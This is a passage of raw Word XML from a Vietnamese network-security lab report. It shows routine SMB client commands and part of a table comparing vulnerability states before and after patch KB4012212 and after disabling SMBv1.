          <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
          <w:i/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t>S_3</w:t>
      </w:r>
      <w:r>
        <w:t>, sau khi trạm Kali Linux hoàn tất các kịch bản kiểm thử, trạm Client thực hiện các thao tác truy cập nghiệp vụ chuẩn mực:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="33A2C52B" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">1. </w:t>
      </w:r>
      <w:r>
        <w:t>Thực hiện lệnh gắn kết tài nguyên chia sẻ qua giao thức SMB:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8784"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DB6619" w14:paraId="7BA96FC5" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8784" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F5F9"/>
          </w:tcPr>
          <w:p w14:paraId="0672C2D7" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">   net use Z: \\192.168.10.20\ShareData /user:labuser Password123!</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="2E31C537" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00DB6619"/>
    <w:p w14:paraId="46679124" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:before="40" w:after="40"/>
        <w:ind w:left="504"/>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:color w:val="1F497D"/>
        </w:rPr>
        <w:t xml:space="preserve">2. </w:t>
      </w:r>
      <w:r>
        <w:t>Thực hiện đọc, ghi một tệp tin dữ liệu thử nghiệm và xác nhận phiên truyền thông sử dụng phương ngữ SMBv2 thông qua lệnh PowerShell:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="8784"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DB6619" w14:paraId="149E6E4F" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="8784" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F1F5F9"/>
          </w:tcPr>
          <w:p w14:paraId="0E37FAD5" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="252" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="0F172A"/>
                <w:sz w:val="20"/>
              </w:rPr>
              <w:lastRenderedPageBreak/>
              <w:t xml:space="preserve">   Get-SmbConnection | Select-Object ServerName, Dialect, NumOpens</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="1CFA97A1" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00DB6619"/>
    <w:p w14:paraId="5497C78A" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
      <w:pPr>
        <w:keepNext/>
        <w:spacing w:before="160" w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:i/>
          <w:color w:val="1F497D"/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Bảng 2.2: Ma trận phân tích chuỗi nhân quả qua 4 trạng thái Snapshot đơn biến</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:jc w:val="center"/>
        <w:tblLook w:val="04A0" w:firstRow="1" w:lastRow="0" w:firstColumn="1" w:lastColumn="0" w:noHBand="0" w:noVBand="1"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="857"/>
        <w:gridCol w:w="1243"/>
        <w:gridCol w:w="827"/>
        <w:gridCol w:w="821"/>
        <w:gridCol w:w="827"/>
        <w:gridCol w:w="827"/>
        <w:gridCol w:w="836"/>
        <w:gridCol w:w="836"/>
        <w:gridCol w:w="1010"/>
        <w:gridCol w:w="916"/>
      </w:tblGrid>
      <w:tr w:rsidR="00DB6619" w14:paraId="6076BD68" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF2FA"/>
          </w:tcPr>
          <w:p w14:paraId="5DCEE0FB" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Trạng thái</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF2FA"/>
          </w:tcPr>
          <w:p w14:paraId="6499F3F1" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Biến can thiệp đơn biến</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF2FA"/>
          </w:tcPr>
          <w:p w14:paraId="013060F0" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                <w:b/>
                <w:i/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>R</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF2FA"/>
          </w:tcPr>
          <w:p w14:paraId="38037862" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                <w:b/>
                <w:i/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>S</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF2FA"/>
          </w:tcPr>
          <w:p w14:paraId="782E0CFC" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                <w:b/>
                <w:i/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>D</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF2FA"/>
          </w:tcPr>
          <w:p w14:paraId="19B50C7F" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                <w:b/>
                <w:i/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>V</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF2FA"/>
          </w:tcPr>
          <w:p w14:paraId="51AD1BCF" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                <w:b/>
                <w:i/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>E</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF2FA"/>
          </w:tcPr>
          <w:p w14:paraId="7910AC76" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                <w:b/>
                <w:i/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>C</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF2FA"/>
          </w:tcPr>
          <w:p w14:paraId="0FB52A06" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Trạng thái nghiệp vụ VLAN 30</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="EBF2FA"/>
          </w:tcPr>
          <w:p w14:paraId="3419E519" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="60" w:after="60" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="22"/>
              </w:rPr>
              <w:t>Kết luận khoa học</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="2E91FA7A" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="464D2A01" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>$S_0$</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="19513F6F" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Baseline gốc (Chưa can thiệp)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="5CFB3B59" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>True</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2D209DC0" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>True</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="57508F1D" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>True</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="488F267F" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>True</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="36C4C39C" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>True*</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3590F99C" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>True*</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="15C4A985" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Kết nối thành công (SMBv1 / SMBv2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="34A8109C" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Điểm chuẩn lỗ hổng ban đầu</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="66B3C13C" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="3142F0F0" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>$S_1$</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="70220020" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Cài đặt bản vá KB4012212</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="636BBCC4" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>True</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="37358FD5" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>True</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="1CDBB60C" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>True</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="33E3B1C4" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>False</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="41278A03" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>False</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="24E67ED1" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>False</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="399BD6B7" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Kết nối thành công (SMBv2)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="F8FAFC"/>
          </w:tcPr>
          <w:p w14:paraId="2A890C90" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Bản vá bẻ gãy </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                <w:i/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>V</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">; </w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Cambria Math" w:hAnsi="Cambria Math"/>
                <w:i/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>R, S, D</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve"> vẫn mở</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00DB6619" w14:paraId="60F4F33B" w14:textId="77777777">
        <w:trPr>
          <w:jc w:val="center"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1908FB3B" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>$S_2$</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="089AD782" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>Vô hiệu hóa SMBv1 (</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
                <w:color w:val="1F497D"/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>SMB1 = 0</w:t>
            </w:r>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>)</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="374A5E3C" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>True</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="3B0DECA1" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>True</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="203BA53F" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>False</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="2B3F23AD" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
              <w:jc w:val="center"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:sz w:val="21"/>
              </w:rPr>
              <w:t>False</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="878" w:type="dxa"/>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="304869C2" w14:textId="77777777" w:rsidR="00DB6619" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:before="40" w:after="40" w:line="276" w:lineRule="auto"/>
